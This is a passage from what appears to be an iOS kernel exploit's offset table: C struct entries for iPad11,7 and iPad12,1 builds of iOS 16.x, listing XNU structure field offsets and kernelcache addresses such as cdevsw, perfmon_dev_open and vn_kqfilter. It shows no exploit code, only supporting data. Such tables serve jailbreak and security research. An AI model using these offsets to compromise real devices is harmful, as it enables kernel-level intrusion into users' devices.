= 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0e1178, .kernelcache__gPhysBase = 0xfffffff0077e7d48, .kernelcache__gPhysSize = 0xfffffff0077e7d48 + 8, .kernelcache__gVirtBase = 0xfffffff0077e5f28, .kernelcache__perfmon_devices = 0xfffffff00a11c380, .kernelcache__perfmon_dev_open = 0xfffffff007e37398, .kernelcache__ptov_table = 0xfffffff00779b288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a11b800, .kernelcache__vm_pages = 0xfffffff0077980c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00779a248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a11b7f8, .kernelcache__vn_kqfilter = 0xfffffff007e89a20, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad11,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0e1178, .kernelcache__gPhysBase = 0xfffffff0077e7d48, .kernelcache__gPhysSize = 0xfffffff0077e7d48 + 8, .kernelcache__gVirtBase = 0xfffffff0077e5f28, .kernelcache__perfmon_devices = 0xfffffff00a11c380, .kernelcache__perfmon_dev_open = 0xfffffff007e37398, .kernelcache__ptov_table = 0xfffffff00779b288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a11b800, .kernelcache__vm_pages = 0xfffffff0077980c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00779a248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a11b7f8, .kernelcache__vn_kqfilter = 0xfffffff007e89a20, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad11,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a19d208, .kernelcache__gPhysBase = 0xfffffff0078c3fa0, .kernelcache__gPhysSize = 0xfffffff0078c3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078c2178, .kernelcache__perfmon_devices = 0xfffffff00a1db500, .kernelcache__perfmon_dev_open = 0xfffffff007e55a88, .kernelcache__ptov_table = 0xfffffff007877160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1da990, .kernelcache__vm_pages = 0xfffffff007873ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007876110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1da988, .kernelcache__vn_kqfilter = 0xfffffff007ea463c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad11,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a19d208, .kernelcache__gPhysBase = 0xfffffff0078c3fa0, .kernelcache__gPhysSize = 0xfffffff0078c3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078c2178, .kernelcache__perfmon_devices = 0xfffffff00a1db500, .kernelcache__perfmon_dev_open = 0xfffffff007e55a88, .kernelcache__ptov_table = 0xfffffff007877160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1da990, .kernelcache__vm_pages = 0xfffffff007873ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007876110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1da988, .kernelcache__vn_kqfilter = 0xfffffff007ea463c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad11,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a1a5288, .kernelcache__gPhysBase = 0xfffffff0078c80e0, .kernelcache__gPhysSize = 0xfffffff0078c80e0 + 8, .kernelcache__gVirtBase = 0xfffffff0078c62b8, .kernelcache__perfmon_devices = 0xfffffff00a1e3500, .kernelcache__perfmon_dev_open = 0xfffffff007e59c8c, .kernelcache__ptov_table = 0xfffffff00787b160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1e2990, .kernelcache__vm_pages = 0xfffffff007877ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00787a110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1e2988, .kernelcache__vn_kqfilter = 0xfffffff007ea8ad8, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad11,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a23dab0, .kernelcache__gPhysBase = 0xfffffff0078dc288, .kernelcache__gPhysSize = 0xfffffff0078dc288 + 8, .kernelcache__gVirtBase = 0xfffffff0078da440, .kernelcache__perfmon_devices = 0xfffffff00a27d530, .kernelcache__perfmon_dev_open = 0xfffffff007e7e434, .kernelcache__ptov_table = 0xfffffff00788f9a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a27c910, .kernelcache__vm_pages = 0xfffffff00788c0f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788e950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a27c908, .kernelcache__vn_kqfilter = 0xfffffff007eccc44, }, // iPad Gen 9th Wifi // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:54 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8030", .build_version = "20C65", .device_id = "iPad12,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a29d178, .kernelcache__gPhysBase = 0xfffffff00784bb98, .kernelcache__gPhysSize = 0xfffffff00784bb98 + 8, .kernelcache__gVirtBase = 0xfffffff007849d78, .kernelcache__perfmon_devices = 0xfffffff00a2d8370, .kernelcache__perfmon_dev_open = 0xfffffff007eb4bd8, .kernelcache__ptov_table = 0xfffffff0077ff260, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2d7800, .kernelcache__vm_pages = 0xfffffff0077fc088, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fe210, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2d77f8, .kernelcache__vn_kqfilter = 0xfffffff007f06f14, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:00 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8030", .build_version = "20D47", .device_id = "iPad12,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a5178, .kernelcache__gPhysBase = 0xfffffff00784bc80, .kernelcache__gPhysSize = 0xfffffff00784bc80 + 8, .kernelcache__gVirtBase = 0xfffffff007849e60, .kernelcache__perfmon_devices = 0xfffffff00a2e0370, .kernelcache__perfmon_dev_open = 0xfffffff007ebcbe8, .kernelcache__ptov_table = 0xfffffff0077ff2a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2df800, .kernelcache__vm_pages = 0xfffffff0077fc0c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fe250, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2df7f8, .kernelcache__vn_kqfilter = 0xfffffff007f0ef14, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:00 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8030", .build_version = "20D67", .device_id = "iPad12,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a5178, .kernelcache__gPhysBase = 0xfffffff00784bc80, .kernelcache__gPhysSize = 0xfffffff00784bc80 + 8, .kernelcache__gVirtBase = 0xfffffff007849e60, .kernelcache__perfmon_devices = 0xfffffff00a2e0370, .kernelcache__perfmon_dev_open = 0xfffffff007ebcbe8, .kernelcache__ptov_table = 0xfffffff0077ff2a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2df800, .kernelcache__vm_pages = 0xfffffff0077fc0c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fe250, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2df7f8, .kernelcache__vn_kqfilter = 0xfffffff007f0ef14, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:28 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8030", .build_version = "20F66", .device_id = "iPad12,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 